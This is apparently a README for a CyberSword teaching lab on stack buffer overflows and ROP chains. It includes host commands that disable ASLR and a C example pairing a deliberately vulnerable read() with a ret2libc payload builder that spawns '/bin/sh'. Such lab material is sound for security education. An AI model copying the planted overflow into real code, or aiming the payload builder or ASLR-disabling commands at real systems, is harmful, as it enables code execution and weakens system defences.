A lab to explain ropchain exploits
This is part of CyberSword.
This is a Docker container that instructs students to overwrite the saved return address ($eip)
with a stack buffer overflow and then chain ROP gadgets (a ropchain attack) to get code execution
without needing an executable stack.
Because a Docker container shares the host kernel, two kernel settings must be changed on the host
(setting them inside the container does not work): ASLR must be disabled so addresses stay fixed
between runs, and core files must be written to a predictable path. Both settings reset on reboot.

```sh
# Disable ASLR
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
# Store core files in /tmp
echo '/tmp/core.%e.%p' | sudo tee /proc/sys/kernel/core_pattern
```

In the core pattern, %e expands to the executable name and %p to the PID. The path is opened in
the filesystem namespace of the crashing process, so the core file lands in the container's /tmp,
not the host's. The shell that runs the target also needs a non-zero core size limit
(ulimit -c unlimited), or no core file is written at all.
This lab expects to be started from a docker-compose.yml
like this, from CyberSword.
If you don't want to use that, delete the lines that expect the CyberSword setup scripts.
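To make "overwrite $eip with a buffer overflow to perform a ropchain attack" concrete, here is an added example; it is not the lab's own target or solution. It pairs a minimal 32-bit stack-overflow target with a helper that lays out the payload: filler up to the saved return address, then the chain words in the order the `ret` instructions will pop them. Every address and the padding length are placeholders (assumed values, marked in the code); the real ones come from the lab binary, for example from pwntools ELF/ROP or from a core file after crashing the target with a cyclic pattern, and they only stay fixed with ASLR off and a non-PIE build.

```c
/* Added example, not the lab's target or its solution: a minimal 32-bit
 * stack-overflow target plus a helper that lays out a ROP chain for it.
 * All addresses and the padding length are placeholders; the real values
 * come from the lab binary (e.g. pwntools ELF/ROP, or a core file after
 * crashing it with a cyclic pattern) and only stay fixed with ASLR off
 * and a non-PIE build.
 *
 * Build the target with the mitigations a ROP lab disables:
 *   gcc -m32 -fno-stack-protector -no-pie -o rop_example rop_example.c
 * Then: ./rop_example gen > payload && ./rop_example < payload
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Deliberately vulnerable: up to 256 bytes are read into a 64-byte buffer.
 * Bytes past buf overwrite the saved EBP and then the saved return
 * address; the `ret` at the end of vuln() pops that word into $eip. */
void vuln(void)
{
    char buf[64];
    ssize_t n = read(0, buf, 256); /* 256 > sizeof buf: stack overflow */
    (void)n;
}

/* Store v little-endian, the byte order x86 uses for an address in memory. */
static void put32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Read back a little-endian word at byte offset off (for checking layouts). */
uint32_t rop_word_at(const unsigned char *p, size_t off)
{
    return (uint32_t)p[off] | ((uint32_t)p[off + 1] << 8) |
           ((uint32_t)p[off + 2] << 16) | ((uint32_t)p[off + 3] << 24);
}

/* Lay out a payload: pad filler bytes up to the saved return address, then
 * the chain words in order. chain[0] becomes $eip when vuln() returns; each
 * later word is popped by the next `ret`. Returns the payload length, or 0
 * if it does not fit in cap bytes. */
size_t rop_build(unsigned char *out, size_t cap, size_t pad,
                 const uint32_t *chain, size_t n)
{
    size_t len = pad + 4 * n;
    if (len > cap)
        return 0;
    memset(out, 'A', pad);
    for (size_t i = 0; i < n; i++)
        put32(out + pad + 4 * i, chain[i]);
    return len;
}

/* The classic three-word ret2libc chain for the i386 cdecl ABI:
 *   [system][word system will return to][pointer to "/bin/sh"]
 * After `ret` pops system's address, system sees the next word as its
 * return address and the one after it as its first argument. */
size_t rop_ret2libc(unsigned char *out, size_t cap, size_t pad,
                    uint32_t system_addr, uint32_t ret_addr,
                    uint32_t binsh_addr)
{
    uint32_t chain[3] = { system_addr, ret_addr, binsh_addr };
    return rop_build(out, cap, pad, chain, 3);
}

/* "gen" writes a payload to stdout; with no argument the binary is the target. */
int main(int argc, char **argv)
{
    unsigned char payload[256];
    size_t len;

    if (argc < 2 || strcmp(argv[1], "gen") != 0) {
        vuln();
        return 0;
    }
    /* Assumed: 76 bytes from buf to the saved return address (64-byte
     * buffer, alignment padding, saved EBP); measure it on the real binary. */
    len = rop_ret2libc(payload, sizeof payload, 76,
                       0xf7e0c2e0u,  /* placeholder: system() in libc */
                       0xf7dfa8b0u,  /* placeholder: exit(), so the shell exits cleanly */
                       0xf7f4bd5cu); /* placeholder: "/bin/sh" string in libc */
    if (len == 0)
        return 1;
    return fwrite(payload, 1, len, stdout) == len ? 0 : 1;
}
```

The second word of the ret2libc chain is what system() returns to, which is why a ROP chain is a sequence of addresses rather than one: each `ret` consumes the next word. Swap the three words for gadget addresses ending in `ret` and the same builder produces a general chain.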
References:
- https://textbook.cs161.org/memory-safety/x86.html
- https://stackoverflow.com/questions/69559640/how-can-i-get-a-corefile-for-a-pe-in-python-like-i-can-with-pwntools-for-an-elf
- https://tc.gts3.org/cs6265/tut/tut06-01-rop.html
- https://github.com/Gallopsled/pwntools-tutorial/blob/master/rop.md
- https://docs.pwntools.com/en/stable/rop/rop.html
- https://ocw.cs.pub.ro/courses/cns/labs/lab-08
- https://ir0nstone.gitbook.io/notes/binexp/stack/pie/pie-bypass
- https://docs.pwntools.com/en/stable/elf/corefile.html